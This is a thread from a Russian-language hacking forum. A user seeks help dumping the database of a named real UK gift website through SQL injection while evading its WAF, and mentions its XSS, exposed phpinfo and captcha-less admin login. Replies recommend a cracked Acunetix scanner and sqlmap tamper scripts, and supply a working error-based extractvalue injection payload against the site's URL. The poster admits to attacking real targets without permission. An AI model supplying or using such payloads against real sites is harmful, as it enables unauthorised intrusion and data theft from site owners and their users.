• XSS.stack #1 – первый литературный журнал от юзеров форума

Помощь с SQLI

users_h8

HDD-drive
Пользователь
Реакции
21
Нашел на сайте SQLI - https://www.giftgen.co.uk/gift-ideas/for_girls - этот URL инжектится. На сайте стоит WAF который базовые запросы блокирует, вручную никак не могу словить устойчивый паттерн для выгрузки БД. Может кто помочь?

Также там XSS есть, но от неё толку совсем нету для меня, да и сайт я взял просто для практики навыков, а спросить больше негде.
Ещё есть открытый phpinfo + логин в админку без капчи.

Буду очень благодарен за помощь.

Ну первое что приходит в голову, это просканить каким нибудь окунем, посмотреть запросы и уязвы, которые он найдет. В мапу закинуть, тамперы перебрать, чтобы обойти ваф, может какой нибудь подойдет.
А вообще, я на сайте не вижу даже формы авторизации, смысл лить такой сайт?

В твоем случае скорее всего поможет вместо пробела использовать %0A

Так же проблема с concat.
gift-ideas/couple/18-30_years%27or(extractvalue(1,make_set(3,0x3a,(select+table_name+from+information_schema.tables+limit+1,1))))and%27
Держи рабочий способ.

Последнее редактирование:
Ну первое что приходит в голову, это просканить каким нибудь окунем, посмотреть запросы и уязвы, которые он найдет. В мапу закинуть, тамперы перебрать, чтобы обойти ваф, может какой нибудь подойдет.
А вообще, я на сайте не вижу даже формы авторизации, смысл лить такой сайт?
Можешь подсказать, что такое окунь? Видел пару упоминаний об этом, но до конца не понял, что это. Сканер какой-то?

По поводу сайта - просто практика для меня. По сути не так давно начал бить по реальным целям, потому собрал себе пачку сайтов и пытаюсь постепенно каждый из них отработать.

Можешь подсказать, что такое окунь? Видел пару упоминаний об этом, но до конца не понял, что это. Сканер какой-то?

По поводу сайта - просто практика для меня. По сути не так давно начал бить по реальным целям, потому собрал себе пачку сайтов и пытаюсь постепенно каждый из них отработать.
Acunetix, сканер сайтов, есть крякнутый, накати попробуй. Удачи!) Тренируйся больше и все получится

В твоем случае скорее всего поможет вместо пробела использовать %0A

Так же проблема с concat.
gift-ideas/couple/18-30_years%27or(extractvalue(1,make_set(3,0x3a,(select+table_name+from+information_schema.tables+limit+1,1))))and%27
Держи рабочий способ.
Спасибо за помощь!

Acunetix, сканер сайтов, есть крякнутый, накати попробуй. Удачи!) Тренируйся больше и все получится
Спасибо, попробую) Как раз есть цель на которой его проверить нужно.

Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх